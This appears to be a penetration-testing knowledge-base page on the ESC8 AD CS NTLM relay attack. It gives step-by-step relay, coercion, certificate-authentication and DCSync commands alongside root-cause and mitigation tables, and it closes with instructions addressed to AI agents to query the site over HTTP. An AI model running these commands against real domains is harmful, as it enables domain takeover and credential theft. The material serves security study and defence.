# ESC8 **What is ESC8?** ESC8 abuses **AD CS HTTP/HTTPS enrollment endpoints** that are vulnerable to **NTLM relay attacks** in their default configuration. AD CS exposes several web-based enrollment interfaces via these server roles: | Role | Protocol | Path | | ----------------------------------------------- | ---------- | ------------------------------------- | | Web Enrollment | HTTP/HTTPS | `/certsrv/` | | Certificate Enrollment Web Service (CES) | HTTPS | `/ADPolicyProvider_CEP_*/service.svc` | | Certificate Enrollment Policy Web Service (CEP) | HTTPS | `/certsrv/mscep/` | | Network Device Enrollment Service (NDES) | HTTP/HTTPS | `/certsrv/mscep/` | > **Important:** HTTPS alone does **not** protect against NTLM relay. What prevents relay is **NTLM signing** or [**Extended Protection for Authentication (EPA)**](#user-content-fn-1)[^1] neither of which is enforced by default on these endpoints. *** **How ESC8 Works** The attack has two phases: **1. Coerce NTLM authentication** from a target machine account (e.g. a Domain Controller) to your listener. **2. Relay that authentication** to the CA's web enrollment interface and request a certificate from a template that allows: * Domain computer enrollment * Client Authentication EKU Once you hold a valid certificate for the DC machine account, you can: * Request a **TGT** for that account via PKINIT * Retrieve its **NTLM hash** via UnPAC-the-Hash (THEFT5) * From there → **DCSync** → full domain compromise *** **Coercion > Background** Historically, **SpoolSample** (Print Spooler bug) and **PetitPotam** (EFS coercion) were the go-to tools. Microsoft has since patched the most common coercion vectors: * Anti-PetitPotam patches disabled unauthenticated EFS coercion over WebDAV * Print Spooler patches addressed SpoolSample However, **Coercer** enumerates and abuses many alternative RPC methods that remain unpatched, making coercion still very viable in most environments. *** **Exploitation Linux** **Step 1 Start the NTLM Relay Listener** bash ```bash ntlmrelayx.py -t http://ca.domain.corp/certsrv/certfnsh.asp -smb2support --adcs --template 'DomainController' ``` > Target the `DomainController` template when relaying a DC machine account. For regular machine accounts, use `Machine` or another template with Client Authentication. *** **Step 2 Coerce Authentication from the Target** Using Coercer with a specific RPC method: ```bash Coercer.py coerce -l -t dc01.domain.corp -u username -p 'Password' -d domain.corp -v --filter-method-name "EfsRpcDuplicateEncryptionInfoFile" ``` * `-l` your listener / relay host * `-t` the target you want to coerce (typically the DC) * `--filter-method-name` specify a particular coercion method; useful when some are patched If the relay succeeds, `ntlmrelayx` will output a `.pfx` certificate file for the relayed account. *** **Step 3 Authenticate with the Certificate** Use `certipy` to authenticate with the obtained certificate and retrieve the NTLM hash (UnPAC-the-Hash): ```bash certipy auth -pfx dc01.pfx -dc-ip ``` This returns the **NT hash** of the machine account. *** **Step 4 DCSync Using the Hash** ```bash secretsdump.py -hashes : 'domain.corp/dc01$@dc01.domain.corp' ``` *** **Why This Works (Root Cause)** | Condition | Details | | ------------------------ | ------------------------------------------------------------------------------ | | HTTP enrollment enabled | The `/certsrv/` interface is exposed | | No NTLM signing enforced | The endpoint accepts relayed NTLM auth | | No EPA configured | Extended Protection for Authentication not required | | Permissive template | `DomainController` / `Machine` allows computer enrollment with Client Auth EKU | **Mitigation** | Fix | How | | --------------------------------- | ------------------------------------------------------------------- | | Disable HTTP enrollment if unused | Remove the Web Enrollment role or restrict access | | Enable HTTPS + EPA | Require Extended Protection for Authentication on IIS | | Enable NTLM signing | Prevents relay at the network level | | Restrict sensitive templates | Limit enrollment on `DomainController` template to only CA managers | | Add DCs to Protected Users | Prevents NTLM authentication from DC accounts entirely | **Key Difference from ESC1** | | ESC1 | ESC8 | | --------------- | ----------------------------- | --------------------------------- | | **Vector** | Misconfigured template | Misconfigured enrollment endpoint | | **Requires** | Enroll rights on template | Network access + coercible target | | **Auth method** | Direct certificate request | NTLM relay | | **Target** | Any account you can enroll as | Machine accounts (coerced) | **Lab Writeup** ESC8 was exploited in the **ShadowGate** machine on the [HackSmarter](https://www.hacksmarter.org/) platform. > 📖 [ShadowGate Writeup -> Exploiting ESC8](https://l1nuxkid.gitbook.io/l1nuxkid-docs/hacksmarter-labs/shadowgate-easy-hacksmarter#exploiting-esc8) [^1]: EPA binds the authentication to the specific TLS-protected connection and intended server, so an attacker cannot simply relay the authentication to another service. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/active-directory-certificate-services-ad-cs/esc8.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.